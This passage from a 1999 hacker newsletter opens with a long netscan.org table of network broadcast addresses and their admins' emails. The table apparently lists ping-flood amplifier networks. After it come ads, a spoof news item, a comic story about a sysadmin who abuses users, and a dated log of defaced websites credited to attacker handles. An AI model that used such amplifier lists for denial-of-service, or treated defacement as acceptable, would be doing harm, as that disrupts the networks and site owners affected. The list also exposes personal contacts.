23 209.235.124.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.125.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.126.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.127.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.94.160.0 wells@wctc.net
23 216.100.190.0 ip-admin@pbi.net
23 216.100.191.0 ip-admin@pbi.net
23 209.79.246.0 ip-admin@pbi.net
23 209.79.247.0 ip-admin@pbi.net
23 210.141.247.0 hostmaster@nic.ad.jp
23 208.235.248.0 pokeefe@checkfree.com
23 212.250.1.255 nmc@ntli.net, pulak.rakshit@ntli.net
23 212.250.2.255 nmc@ntli.net, bob.procter@ntli.net
23 212.58.5.255 cengiz@doruk.net.tr, gokhan@doruk.net.tr
23 212.146.7.255 jukka.ylonen@kpy.fi, ripe.tech@raketti.net,
ripe.registry@raketti.net,
ripe.sales@raketti.net, petri.siltakoski@kpy.fi
23 212.58.28.255 cengiz@doruk.net.tr, gokhan@doruk.net.tr
23 212.58.29.255 paksoy@turktel.net, cengiz@doruk.net.tr
23 216.205.48.255 neteng@sagenetworks.com
23 216.205.49.255 neteng@sagenetworks.com
23 216.205.50.255 neteng@sagenetworks.com
23 209.235.69.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.70.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.71.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.72.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.73.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.74.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.75.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.76.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.77.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.78.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.79.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.80.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.112.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.113.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.114.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.115.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.116.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.117.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.118.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.119.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.120.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.121.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.122.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.123.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.124.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.125.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.126.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 209.235.127.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com'
23 216.100.185.255 ip-admin@pbi.net
23 216.100.190.255 ip-admin@pbi.net
23 216.100.191.255 ip-admin@pbi.net
23 209.79.246.255 ip-admin@pbi.net
23 209.79.247.255 ip-admin@pbi.net
23 210.141.247.255 hostmaster@nic.ad.jp
23 208.235.248.255 pokeefe@checkfree.com
23 216.205.50.0 neteng@sagenetworks.com
23 207.167.204.0 tbrunt@tvo.org
23 209.172.65.255 hostmaster@innetix.com
23 207.109.152.255 dns-info@uswest.net
23 209.21.153.255 hostmaster@harvard.net
23 207.113.154.255 hostmaster@crl.com
23 207.167.204.255 tbrunt@tvo.org
23 207.193.232.255 hostmaster@swbell.net
23 208.145.15.0 stephent@intelis.com
23 207.115.54.0 harrycw@prodigy.net
23 206.234.131.0 hostinfo@psi.com
23 207.203.220.0 ipadmin@bellsouth.net
23 207.86.227.0 dns@digex.net
23 209.131.12.255 nestigoy@mica.net
23 208.145.15.255 stephent@intelis.com
23 207.115.54.255 harrycw@prodigy.net
23 207.203.220.255 ipadmin@bellsouth.net
23 212.246.36.0 jukka.ylonen@kpy.fi, petri.siltakoski@kpy.fi
23 209.43.37.0
23 209.21.131.0 hostmaster@harvard.net
23 209.226.149.0 noc@in.bell.ca
23 207.212.182.0 ip-admin@pbi.net
23 208.240.184.255 smw@tritonworks.com
23 209.208.145.0 hostmaster@pfmc.net
23 209.214.177.0 ipadmin@bellsouth.net
23 209.214.181.0 ipadmin@bellsouth.net
23 216.76.212.0 ipadmin@bellsouth.net
23 206.234.131.255 hostinfo@psi.com
23 209.208.145.255 hostmaster@pfmc.net
23 209.214.177.255 ipadmin@bellsouth.net
23 209.214.181.255 ipadmin@bellsouth.net
23 216.76.212.255 ipadmin@bellsouth.net
23 209.226.144.0 noc@in.bell.ca
23 208.244.213.0 pforbes@opcode.com
23 208.129.226.0 vince@markzware.com
23 209.48.15.255 dns@digex.net
23 207.77.72.255 george@laserlink.net
23 209.226.144.255 noc@in.bell.ca
23 209.226.149.255 noc@in.bell.ca
23 209.39.117.0 netadmin@onramp.net
23 207.126.109.255 noc@above.net
23 209.39.117.255 netadmin@onramp.net
23 208.168.208.255 julianc@peganet.net
23 207.194.160.255 domains@bctel.net
23 207.94.162.255 owen@hodes.com
23 208.20.79.0 NOC@sprint.net
23 208.20.79.255 NOC@sprint.net
23 207.63.253.255 twilliams@lth6.k12.il.us
23 207.63.254.255 twilliams@lth6.k12.il.us
23 210.159.103.255 hostmaster@nic.ad.jp
23 209.7.240.0 djurewic@lth3.k12.il.us
23 209.7.240.255 djurewic@lth3.k12.il.us
23 209.122.30.255 domreg@erols.com
23 210.68.152.255
22 24.5.113.255 noc@noc.home.net
22 134.241.142.255 hostmaster@umassp.edu
22 134.241.250.255 hostmaster@umassp.edu
22 140.239.42.255 hostmaster@harvard.net
22 152.9.100.0 westg@mars.nccu.edu
22 152.9.100.255 westg@mars.nccu.edu
22 158.59.12.255 snicho@co.arlington.va.us
22 161.223.34.255
22 192.101.126.0 DSN1GCM@dsn10.med.navy.mil
22 192.122.222.0 aconway@hdl.ie
22 192.122.222.255 aconway@hdl.ie
22 193.0.84.255 Marcin.Gromisz@fuw.edu.pl,
Michal.Jankowski@fuw.edu.pl
22 193.106.9.255 yp@jouve.fr
22 193.49.105.0 cambon@lirmm.fr, gg@lirmm.fr
22 193.73.128.0 te@sda-ats.ch
22 193.98.234.0 admin@bbr-bremen.de
22 193.98.234.255 admin@bbr-bremen.de
22 194.100.10.0 route-adm@clinet.fi, hsu@bbnetworks.net
22 194.100.10.255 route-adm@clinet.fi, hsu@bbnetworks.net
22 194.100.11.0 route-adm@clinet.fi, hsu@bbnetworks.net
22 194.100.14.0 route-adm@clinet.fi, hsu@bbnetworks.net
22 194.100.14.255 route-adm@clinet.fi, hsu@bbnetworks.net
22 194.137.9.255 jukka.vesterinen@ctse.fi
22 194.254.148.0 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr,
aperio@luminy.univ-mrs.fr
22 194.254.149.0 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr,
aperio@luminy.univ-mrs.fr
22 194.64.121.255 schreiber@otterbach.de
22 194.73.96.0 dcheetham@gateshead.ac.uk
22 194.73.96.255 dcheetham@gateshead.ac.uk
22 194.75.152.255 chris@delphi.com, ianreeves@delphi.com
22 194.89.13.0
22 195.182.176.255
22 195.182.188.255
22 195.182.189.255 y.cheung@dccl.net, c.heald@dccl.net
22 195.27.208.255 spona@tmt.de, hoereth@tmt.de,
peter.maisel@maisel.de, hostmaster@maisel.de
22 198.123.17.255 NSIOPS@nsipo.nasa.gov
22 198.60.134.0 hall@sandbox.net
22 198.60.134.255 hall@sandbox.net
22 199.108.74.0 dns@cerf.net
22 199.211.153.0 moffettm@dmcm.ssc.af.mil
22 199.76.61.255 philt@amelia.bham.lib.al.us
22 200.10.112.0 carlospe@ssdnet.com.ar
22 200.10.112.255 carlospe@ssdnet.com.ar
22 200.17.93.0 gomide@nic.br
22 200.17.93.255 gomide@nic.br
22 202.167.1.0
22 202.167.1.255
22 202.208.64.0 technical@apnic.net
22 202.213.5.255 hostmaster@nic.ad.jp
22 202.77.222.0 belcina@attmail.com
22 202.77.222.255 belcina@attmail.com
22 203.126.205.0 hostmaster@singnet.com.sg
22 203.127.187.0 jeremy@sns.com.sg
22 203.140.3.0 hostmaster@nic.ad.jp
22 203.140.3.255 hostmaster@nic.ad.jp
22 203.146.30.0 kanok@loxinfo.co.th, patkamol@loxinfo.co.th
22 203.21.30.0 hostmaster@telstra.net
22 203.238.129.0 mgr@nownuri.net, ip@nownuri.net
22 203.26.109.255 hostmaster@telstra.net
22 204.112.189.0 admin@autobahn.mb.ca
22 204.112.189.255 admin@autobahn.mb.ca
22 204.131.232.255 dave@psd.k12.co.us
22 204.133.45.0 sbrown@co.weld.co.us
22 204.133.45.255 sbrown@co.weld.co.us
22 204.151.38.255 bterry@burnettgroup.com
22 204.158.119.0 gjenere@tenet.edu
22 204.180.36.0 NOC@sprint.net
22 204.192.47.255 noc@digex.net
22 204.234.20.0 murbach@docsun.doc.state.ne.us
22 204.234.20.255 murbach@docsun.doc.state.ne.us
22 204.234.21.0 murbach@docsun.doc.state.ne.us
22 204.234.22.255 murbach@docsun.doc.state.ne.us
22 204.248.113.255 NOC@sprint.net
22 204.29.20.255 edm@nwnexus.wa.com
22 204.48.149.0 tuma@ceo.sbceo.k12.ca.us
22 204.49.196.255 dns@sprintans.net
22 204.57.191.0 john@bmi.net
22 205.139.15.0 brendan@genghis.com
22 205.213.150.0 nic@mail.wiscnet.net
22 205.247.7.255 sbriggs@i-2000.com
22 206.129.189.0 dns-admin@ixa.net
22 206.135.165.0 dnstech@eni.net
22 206.144.157.0 stan@riversidecolor.com
22 206.16.65.0 prophead@blacktop.com
22 206.165.94.0 noc@globalcenter.net
22 206.165.94.255 noc@globalcenter.net
22 210.75.39.0 weixian@sti.gd.cn, fangxx@sti.gd.cn
22 207.213.24.255 dennis@globalpac.com
22 208.156.204.0 nomailbox@nowhere
22 210.141.237.0 hostmaster@nic.ad.jp
22 207.153.112.0 noc@netrail.net
22 207.167.112.0 sheri@inetworld.net
22 210.134.206.0 hostmaster@nic.ad.jp
22 210.156.209.0 hostmaster@nic.ad.jp
22 210.156.210.0 hostmaster@nic.ad.jp
22 207.153.112.255 noc@netrail.net
22 208.12.176.255 nomailbox@nowhere
22 210.156.210.255 hostmaster@nic.ad.jp
22 209.122.173.0 domreg@erols.com
22 206.37.32.255 norberg@medsva.brooks.af.mil
22 209.215.20.0 ipadmin@bellsouth.net
22 216.78.24.0 ipadmin@bellsouth.net
22 212.58.28.0 cengiz@doruk.net.tr, gokhan@doruk.net.tr
22 210.159.100.0 hostmaster@nic.ad.jp
22 210.159.113.0 hostmaster@nic.ad.jp
22 210.159.115.0 hostmaster@nic.ad.jp
22 210.159.118.0 hostmaster@nic.ad.jp
22 206.216.125.0 vala@wvpa.com
22 207.225.140.0 dns-info@uswest.net
22 208.154.170.0 ipadmin@cw.net
22 207.204.174.0 domainadmin@combase.com
22 209.122.182.0 domreg@erols.com
22 209.54.190.0 darin@good.net
22 209.214.200.0 ipadmin@bellsouth.net
22 207.204.208.0 domainadmin@combase.com
22 209.215.218.0 ipadmin@bellsouth.net
22 209.215.220.0 ipadmin@bellsouth.net
22 209.54.224.0 domainadmin@combase.com
22 209.215.18.255 ipadmin@bellsouth.net
22 209.215.20.255 ipadmin@bellsouth.net
22 216.78.21.255 ipadmin@bellsouth.net
22 216.78.23.255 ipadmin@bellsouth.net
22 216.78.25.255 ipadmin@bellsouth.net
22 210.159.113.255 hostmaster@nic.ad.jp
22 210.159.115.255 hostmaster@nic.ad.jp
22 210.159.118.255 hostmaster@nic.ad.jp
22 209.94.163.255 wells@wctc.net
22 207.204.174.255 domainadmin@combase.com
22 209.214.180.255 ipadmin@bellsouth.net
22 209.54.190.255 darin@good.net
22 210.225.196.255 hostmaster@nic.ad.jp
22 209.214.201.255 ipadmin@bellsouth.net
22 207.204.208.255 domainadmin@combase.com
22 209.54.224.255 domainadmin@combase.com
22 210.163.252.255 hostmaster@nic.ad.jp
22 209.131.12.0 nestigoy@mica.net
22 207.202.18.0 rosterman@rtquotes.com
22 207.109.152.0 dns-info@uswest.net
22 207.19.163.0 squires@mne.com
22 209.119.250.0 noc@digex.net
22 207.202.18.255 rosterman@rtquotes.com
22 207.19.163.255 squires@mne.com
22 209.79.176.255 diamond@quick.net
22 209.119.250.255 noc@digex.net
22 206.204.9.0 noc@conxion.net
22 210.67.64.0 JamesKLin@acer.net, JacksonWeng@acer.net
22 208.225.145.0 postmaster@dnap.com
22 209.208.185.0 hostmaster@pfmc.net
22 207.70.93.255 hostmaster@interaccess.com
22 209.218.26.0 maggie@redcreek.com
22 209.226.69.0 noc@in.bell.ca
22 207.19.161.0 squires@mne.com
22 207.222.168.0 mark_annati@jwgnet.com
22 210.67.64.255 JamesKLin@acer.net, JacksonWeng@acer.net
22 209.226.69.255 noc@in.bell.ca
22 206.81.145.255 dns-info@uswest.net
22 207.19.161.255 squires@mne.com
22 207.222.168.255 mark_annati@jwgnet.com
22 208.138.51.0 superdb@phonewave.net
22 208.168.238.0 rpost@remc8.k12.mi.us
22 208.138.51.255 superdb@phonewave.net
22 208.168.238.255 rpost@remc8.k12.mi.us
22 208.6.63.0 postmaster@watsonelec.com
22 207.77.72.0 george@laserlink.net
22 209.102.103.0 robertc@savvis.com
22 207.190.143.0 hostmaster@source.net
22 208.6.63.255 postmaster@watsonelec.com
22 207.190.143.255 hostmaster@source.net
22 209.14.108.0 sbeker@ta.telecom.com.ar
22 209.14.109.0 sbeker@ta.telecom.com.ar
22 209.14.108.255 sbeker@ta.telecom.com.ar
22 209.14.109.255 sbeker@ta.telecom.com.ar
22 209.69.159.255 dirvin@123.net
22 206.211.91.255 renae.h.key@gte.sprint.com
22 207.94.189.255 Louis_Lee@icgcomm.com
22 208.201.208.255 shai@interramp.com
22 207.223.57.0 maa@jwgnet.com
22 209.21.201.255 hostmaster@harvard.net
22 208.129.72.0 digital@uscybersites.net
22 209.38.22.255 dnsadmin@rmi.net
22 208.215.55.255 bo@quicklink.com
22 208.129.72.255 digital@uscybersites.net
22 206.211.86.255 renae.h.key@gte.sprint.com
22 209.133.189.0 colgate@oir.state.sc.us
22 209.133.189.255 colgate@oir.state.sc.us
22 206.201.241.255 scarr@huensd.k12.ca.us
22 209.107.45.255 hostmaster@co.verio.net
22 209.47.137.255 bmollon@saatchi.ca
22 209.14.135.255 dnr@spacelab.net
22 208.129.14.0 sundog@coop.crn.org
22 209.208.223.0 hostmaster@pfmc.net
22 209.166.16.0 hostmaster@ultracom.net
22 207.243.35.255 nomailbox@nowhere
22 206.247.91.0 rkd@rmi.net
22 206.247.91.255 rkd@rmi.net
22 209.227.25.255 eric@mxol.com
22 216.102.160.255 ip-admin@pbi.net
21 24.6.100.0 noc@noc.home.net
21 24.6.61.255 noc@noc.home.net
21 24.7.177.255 noc@noc.home.net
21 63.64.219.0 help@uunet.uu.net
21 63.64.219.255 help@uunet.uu.net
21 131.64.12.0 SSNYDER@cols.disa.mil
21 140.251.214.0 vinay@mail.med.cornell.edu
21 140.251.214.255 vinay@mail.med.cornell.edu
21 155.36.122.0 scott@ties.org
21 155.36.122.255 scott@ties.org
21 155.36.123.0 scott@ties.org
21 155.36.123.255 scott@ties.org
21 155.50.21.0 bgallant@keps.com
21 155.50.21.255 bgallant@keps.com
21 160.126.250.0 DEYODEB@detrick.disa.mil
21 160.126.250.255 DEYODEB@detrick.disa.mil
21 160.126.251.255 DEYODEB@detrick.disa.mil
21 161.132.57.255 operador@rcp.net.pe
21 168.234.39.255 mmorales@concyt.gob.gt
21 192.204.141.0
21 192.204.141.255
21 192.207.6.255 tom@server1.angus.com
21 193.100.188.0 herrnfeld@kirchhoff.de
21 193.100.188.255 herrnfeld@kirchhoff.de
21 193.122.10.0
21 193.140.196.0 ozturanm@boun.edu.tr, baysalc@boun.edu.tr
21 193.140.196.255 ozturanm@boun.edu.tr, baysalc@boun.edu.tr
21 193.15.208.0
21 193.194.142.0 kocovski@gagass.de, jan.kocovski@metronet.de
21 193.194.142.255 kocovski@gagass.de, jan.kocovski@metronet.de
21 193.194.143.0 kocovski@gagass.de, jan.kocovski@metronet.de
21 193.194.143.255 kocovski@gagass.de, jan.kocovski@metronet.de
21 193.194.88.0 benhamadi@ist.cerist.dz, elmaouhab@ist.cerist.dz,
cerist2@cnuce.cnr.it
21 193.52.147.0 Gerard.Lietout@univ-rouen.fr
21 193.52.147.255 Gerard.Lietout@univ-rouen.fr
21 193.52.75.0 dupre@genome.vjf.inserm.fr
21 194.100.24.0 miki@clinet.fi, Kari.Rasanen@seiska.fi
21 194.137.92.0 ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi
21 194.137.92.255 ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi
21 194.158.231.0 daniel.waegli@sunrise.ch,
daniel.dubuis@sunrise.ch
21 194.190.192.255 andr@trustworks.com
21 194.199.97.0 Paul.Sarlat@univ-ag.fr
21 194.199.97.255 Paul.Sarlat@univ-ag.fr
21 194.250.16.0 bourgeois@fermic.fr, niel@fermic.fr
21 194.254.147.255 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr,
aperio@luminy.univ-mrs.fr
21 194.255.12.0 paaske@internet.dk
21 194.255.12.255 paaske@internet.dk
21 194.57.10.0 techfem@mobilia.it
21 194.57.10.255 techfem@mobilia.it
21 194.64.121.0 schreiber@otterbach.de
21 195.182.176.0
21 195.182.177.255
Use of netscan.org indicates acceptance of this disclaimer.
� 1998-1999 netscan.org
Site version 0.98
sysop@netscan.org
Changed 12/29/98 0606 PST
@HWA
!=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
O
0
o
O O O
0
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
END of main news articles content... read on for ads, humour, hacked websites etc
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
HWA.hax0r.news
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
AntiOnline to Write Productive, Sense Making Article
Contributed by siko
Tuesday - July 20, 1999. 04:24PM UTC
Early this afternoon, sources close to Innerpulse Media leaked information
coming from the offices of AntiOnline.
"He said he is going to write an article that doesn't piss all the fish in the pond
off.", said the anonymous source. "I think he mentioned something about social
engineering passwords."
Speculation has grown throughout the day as to what could be posted on
AntiOnline.com that actually makes sense and doesn't piss everyone off at the
same time.
"Not everything on there lacks content or doesn't make a point. I really enjoyed
reading about the Granny Hacker from Heck. And that story about the new
Super Computer coming out was really great the third time around on
AntiOnline.com. I just wasn't in the mood two weeks ago."
AntiOnline.com
http://www.antionline.com/
@HWA
http://www.minet.net/blagues/bofh/
The Bastard System Manager From Hell #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I get into my office and it's my first day - I want to make a good impression, so I empty my IN
tray into the bin. Now that's what I call efficient!
I get a call from the big boss - he's been getting complaints about the trainee bastard operator
from hell. I ask him to forward all the complaints to me and that it would be best to let me deal
with them. I ring the operator and get him to make an appointment with me.
Two weeks later, he does, and I show him the complaints that have accumulated so far.
"Seventy Three complaints in your first three weeks!" I shout "It's good - but it's NOT Good Enough!
You should be getting at least 10 complaints a day - AT LEAST! Now, let's see what you're doing wrong:
You get a call from a user - what do you do?"
"Kill them off?" The TBOFH replies
"NO! How can you kill them off if you don't know their USERNAME? Your FIRST priority is to get their
username. Then what would you do?"
"Kill them off?"
"NO! Get them to tell you what their problem is!"
"Why?"
"Because later I can say they didn't explain their problem to you properly! It's a great defence -
works every time. A user rings me up to complain; I listen to their problem, then say "OH, WHEN YOU
SAID `MY PC DOESN'T WORK' HE MUST HAVE THOUGHT YOU MEANT `HOW CAN I MAKE MY PC NEVER WORK AGAIN AND
DESTROY MY LIFE'S WORK AT THE SAME TIME?' - IT HAPPENS ALL THE TIME!' then they tell me how implausible
that is, I say how terribly sorry we are, then fake some connect and CPU time records so their monthly
bill is about the same as the Uraguayan national debt...Understand? So, after you've heard their problem,
what do you do?"
"Kill them off?"
"NO! Then you make up some excuse. Have you got an excuse card calendar?"
"Uh. No.."
"And you said you were qualified to operate a computer! You'd better have mine." I pass my computer card calendar over, flipping it to page one -
"ENTROPY"....... ...I like it. "Now, you give the cretin an excuse then what do you do?"
"Kill them off?"
"YES!" (He certainly has a fixation) "Then what?"
"Hang up?"
"NO! Then they'll call you back when the problem recurs. Your job is to make them FEAR calling you. How can you work when people are calling? So, you make
them pay for calling in the first place. What would you do?"
"Delete their files?"
"Yeah, it's a start, but then they may call back when they get new files. You want them NEVER to call back. What could you do?"
"Swear at them?"
"No. I can see we'll have to demonstrate. Have you got a metal ballpoint?"
"Yes"
"See that wallsocket over there. Take the refill out of the pen and poke in into the wallsocket."
"But it's live!"
"Would I really make you do it if it were live?"
"Oh" >fiddle< >fiddle< >BZZZZZZZEEEEERT!< >THUD!<
of course I would. He was no good anyway. No killing instinct.
@HWA
SITE.1 Three sites this week
#1 http://www.seifried.org/lasg/
Linux Administrators Security Guide
Available in PDF format, a must read for all Sysadmins.
Not much to say about this site, its not flashy, its totally utilitarian and is the place
from which you should get the LASG in its updated form or redirect to mirror sites.
rated: no rating - Ed
Bored?
#2 http://www.policescanner.com/
This site will let you listen via realaudio to scanner output from various areas around the
States, very interesting stuff even (or especially) for you out of towners, good for those
boring weekend nights when scanner traffic is especially busy. Appeals to those that never
miss an episode of COPS or are radio enthusiasts... rated: 7/10 - eentity
Are you missing Packetstorm Security and really want to download some juarez?
#3 http://secureroot.m4d.com/hackattack/files/
try this site, they have a fairly decent archive of older philez, nice flashy site but not
overly done, somewhat of a rootshell flavour.... rated: 7/10 - eentity
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Latest cracked pages courtesy of attrition.org
[99.08.01] [PulseWidth] Run Your Own Business (www.runyourownbusiness.com)
[99.08.01] [PulseWidth] Nellis AFB (www.nellis.af.mil)
[99.08.01] [ ] Nathan & Lewis Securities (www.nlfs.com)
[99.08.01] [HFD] Jerry Springer Show (www.jerryspringer.com)
[99.08.01] [AntiChrist] Expat News (www.expat-news.com)
[99.08.01] [AntiChrist] London Soft (www.londonsoft.com)
[99.08.01] [c0mrade] Maktoob (www.maktoob.com)
[99.08.01] [AntiChrist] K One Inch (www.oneinch.com)
[99.08.01] [AntiChrist] Sandhan (www.sandhan.com)
[99.08.01] [AntiChrist] Savmart (www.savmart.com)
[99.08.01] [AntiChrist] Two 40 (www.two40.com)
[99.08.01] [AntiChrist] Klassic Net (www.klassic.net)
[99.08.01] [AntiChrist] Adworkz Net (www.adworkz.net)
[99.08.01] [AntiChrist] Interstate Mortgage (www.interstatemortgage.net)
[99.08.01] [AntiChrist] McMahon Group (www.mcmahongroup.net)
[99.08.01] [stonehenge crew] One Online (IT) (www.oneonline.it)
[99.08.01] [gH] IDHL Gov (MY) (idhl.gov.my)
[99.08.01] [gH] Imigration Department of Malaysia (MY) (imigresen.imi.gov.my)
[99.08.01] [SOD] Instituto Geografico Agustin Codazzi (www.igac.gov.co)
[99.08.01] [keebler elves] #3 KBS Gov (www.kbs.gov.my)
[99.08.01] [FL3M] M Ecom Malls (www.ecommalls.com)
[99.08.01] [ ] Software Tester (www.softwaretester.com)
[99.08.01] [ReMiX] X-Forces (www.x-forces.com)
[99.08.01] [ ] CK (cc) Minnesota (empire.lansing.cc.mi.us)
[99.08.02] [SQ] KuKluxKlan (www.kkklan.com)
[99.08.02] [red n black] NHM (UK) (www.nhm.ac.uk)
[99.08.02] [LevelSeven] #2 Peronda Net (www.peronda.net)
[99.08.02] [v00d00] K Bears In The Barn (www.bearsinthebarn.com)
[99.08.02] [kastr0] Complete Chaos (www.completechaos.com)
[99.08.02] [FOaM] Karbrella (www.karbrella.com)
[99.08.02] [FL3M] K Career Concepts (www.careerconcepts.com)
[99.08.02] [KHG] Yugoslavia 8m (yugoslavia.8m.com)
[99.08.02] [AntiChrist] Plague 99 (www.plague99.org)
[99.08.02] [AntiChrist] Pleasant Valley UU Church (www.pvuuc.org)
[99.08.02] [AntiChrist] Chinese Club (www.chineseclub.org)
[99.08.02] [AntiChrist] Faith Walker (www.faithwalker.net)
[99.08.02] [AntiChrist] K Starcraft Bunker (www.starcraftbunker.net)
[99.08.02] [AntiChrist] Buy Fab (www.buyfab.com)
[99.08.02] [AntiChrist] CCP Inc. (www.ccp-inc.com)
[99.08.02] [AntiChrist] Click2site (www.edwincolon.click2site.com)
[99.08.02] [AntiChrist] Fil India (www.filindia.com)
[99.08.02] [AntiChrist] General Technologies (www.generaltechnologies.com)
[99.08.02] [AntiChrist] Gentleman Dog (www.gentlemandog.com)
[99.08.02] [AntiChrist] India PR (www.indiapr.com)
[99.08.02] [AntiChrist] Joke Pizza (www.jokepizza.com)
[99.08.02] [AntiChrist] Keywest Shrimphouse (www.keywestshrimphouse.com)
[99.08.02] [AntiChrist] Trivandrum Fair2000 (www.trivandrum-fair2000.com)
[99.08.02] [AntiChrist] Work Comp Online (www.workcomponline.com)
[99.08.02] [Offline] Cairo Net (www.caironet.com)
[99.08.02] [bl0w team] Symantec (www.symantec.com)
[99.08.02] [FL3M] Bennett Street (www.bennettstreet.com)
[99.08.02] [FL3M] K Gamewood Net (www8.gamewood.net)
Of note: AntiChrist calls it quit
NYS returns (worthwhile reading)
Several new defacers hit the scene
[99.08.03] [PulseWidth] Amedd Army (akamai.tamc.amedd.army.mil)
[99.08.03] [AntiChrist] Trivnet Club (www.trivnetclub.com)
[99.08.03] [NYS] K Acte Enterprises (FR) (www.acte-entreprises.fr)
[99.08.03] [ProdiByte] Rosario Bus (AR) (www.rosariobus.com.ar)
[99.08.03] [Some Guy/Cat] Home Amateur (www.homeamateur.com)
[99.08.03] [PulseWidth] K Model Aircraft (www.modelaircraft.org)
[99.08.03] [PulseWidth] Health Library @ McGill (CA) (www.health.library.mcgill.ca)
[99.08.03] [ProdiByte] Bonobus (AR) (www.bonobus.com.ar)
[99.08.03] [KHG] Anti NATO (antinato.homepage.com)
[99.08.03] [KHG] Anti NATO Links (antinatolinks.homepage.com)
